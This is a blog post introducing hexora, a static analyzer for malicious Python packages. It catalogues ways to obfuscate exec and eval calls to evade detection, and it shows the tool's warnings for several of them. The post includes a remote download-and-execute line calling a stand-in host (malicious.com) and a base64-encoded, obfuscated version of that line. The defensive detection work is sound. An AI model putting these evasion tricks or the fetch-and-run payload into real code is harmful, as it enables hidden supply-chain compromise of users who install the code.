Tracking malicious code execution in Python
Recently, I have been working on a new library that statically analyzes Python scripts and detects malicious or harmful code. It's called hexora.
Supply chain attacks have become increasingly common. More than 100 incidents were reported in the past five years for PyPi alone. Let's consider a scenario where a threat actor attempts to upload a malicious package to PyPi.
Usually, malicious packages attempt to imitate a legitimate library so that the main code works as expected. The malicious part is usually inserted into one of the files of the library and executed on import silently.
If the actor lacks experience, he will likely not obfuscate his code at all. Experienced actors usually obfuscate their code or try to avoid simple heuristics such as regexes. Regexes are fragile and can be fooled by using simple tricks, but it's not possible to know them in advance.
One of the problems is that the harder you obfuscate the code, the easier it can be detected. So, actors try to balance things.
In this article, let's see how calls to eval
or exec
can be obfuscated and abused.
Basic usage
The naive way looks as follows:
exec("print(2 + 2)")
eval("2 + 2")
The problem is that many security and audit tools search for exec
or eval
and flag the code for human review.
This kind of search is usually done using regexes.
Confusable homoglyphs
If we only need to bypass simple regexes, confusable homoglyphs can be used.
ℯ𝓍ℯ𝒸("print(2 + 2)")
This actually works in Python!
If proper AST parsing is used, it will be detected as a regular exec
call. When regexes are used, the input must be normalized first.
Using builtins module
Surprisingly, by simply using the builtins module, some detections can be bypassed:
import builtins
builtins.exec("print(2 + 2)")
Obfuscating usage of builtins module
By reassigning the builtins
module to a new variable name (such as b
), we can bypass simple detections:
import builtins
b = builtins
b.exec("2+2")
Even when a simple analyzer knows about the builtins
module, it usually does not follow variable assignments.
Using import
The __import__
dunder function can be used to avoid importing the builtins
module the regular way:
__import__("builtins").exec("2+2")
Constants obfuscation
Obfuscating constants makes simple detections even harder.
__import__("built" + "ins").exec("2+2")
We can also use the getattr
function to specify the exec
function as literal:
getattr(__import__("built"+"ins"),"ex"+"ec")("2+2")
# OR
__import__("built"+"ins").__getattribute__("ex"+"ec")("2+2")
Next option would be using array manipulation functions such as reversed
, join
and [::-1]
to hide the exec
string:
getattr(__import__("built"+"ins"),"".join(reversed(["ec","ex"])))("2+2")
My library can track all of these cases because it evaluates basic string operations.
It only triggers when actual exec
or eval
calls are detected.
warning[HX3030]: Execution of an unwanted code via getattr(__import__(..), ..)
┌─ resources/test/test.py:1:1
│
1 │ getattr(__import__("built"+"ins"),"".join(reversed(["ec","ex"])))("2+2")
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3030
│
= Confidence: VeryHigh
warning[HX3030]: Execution of an unwanted code via __import__
┌─ resources/test/test.py:6:1
│
5 │
6 │ __import__("snitliub"[::-1]).eval("print(123)")
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3030
│
= Confidence: VeryHigh
Importlib
Using __import__
is not the only way to import a module. You can also use importlib
:
import importlib
importlib.import_module("builtins").exec("2+2")
Both __import__
and importlib
are often tracked since they are relatively rare in legitimate code.
Using sys.modules, globals(), locals() or vars()
Using import mechanisms can be avoided by using sys.modules
, globals()
, locals()
or vars()
:
import sys
sys.modules["builtins"].exec("2+2")
globals()["__builtins__"].exec("2+2")
locals()["builtins"].exec("2+2")
# Hide everything
getattr(globals()["__bu"+"ilt"+"ins__"],"".join(reversed(["al","ev"])))("2+2")
Using compile
Calls toexec
and eval
can be avoided by using compile
:
types.FunctionType(compile("print(2+2)","<string>","exec"), globals())()
This can also be obfuscated further or detected using similar techniques as before. It only avoids direct calls to exec
and eval
.
What's usually passed to exec
or eval
?
Usually, the code passed to exec
or eval
is obfuscated as well.
This can be achieved by using various encodings and compression algorithms, such as base64, hex, rot13, marshal, zlib, and so on.
Often, the payload aims to be as minimal as possible to make it harder to detect within the code. Especially when the call is obscured by adding excessive whitespaces so editors do not display it when wrapping is disabled. The only way to notice it is to scroll horizontally.
For example, it can download an external script and execute it:
import urllib.request;eval(urllib.request.urlopen("http://malicious.com/payload.py").read().decode("utf-8"))
The final code injection can look as follows:
getattr(globals()["__bu" + "ilt" + "ins__"], "".join(reversed(["al", "ev"])))(
base64.b64decode(
"aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2V2YWwodXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5weSIpLnJlYWQoKSk="
)
)
When eval/exec calls are chained with base64, it's another signal that there is something fishy going on. Typically, you won't see this kind of calls in legitimate code.
Also, since base64 strings usually have a length that is a multiple of 4 and consist of a specific set of characters, they can be detected too.
warning[HX6000]: Base64 encoded string found, potentially obfuscated code.
┌─ resources/test/test.py:3:9
│
2 │ base64.b64decode(
3 │ "aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2V2YWwodXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5weSIpLnJlYWQoKSk="
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX6000
4 │ )
│
= Confidence: Medium
Help: Base64-encoded strings can be used to obfuscate code or data.
Conclusion
These are basic examples that are still being abused by threat actors who upload them to PyPI.
As you can see, tracking such things in a very dynamic language such as Python is hard! Even when static analysis is used, you need to track a lot of things to be effective.
Static analysis can be replaced with dynamic analysis (code sandboxing), but such an approach has its own drawbacks.
LLMs are pretty good at detecting malicious code as well, but they tend to produce false positives and false negatives. They also have significant costs when scanning tens of thousands of files.
Some companies or research projects train their own machine learning models. Compared to LLMs, they cost way less, but they also require human intervention due to the same accuracy problems.
The best way to approach this problem is to combine all of these techniques and use a human in the loop for the final decision.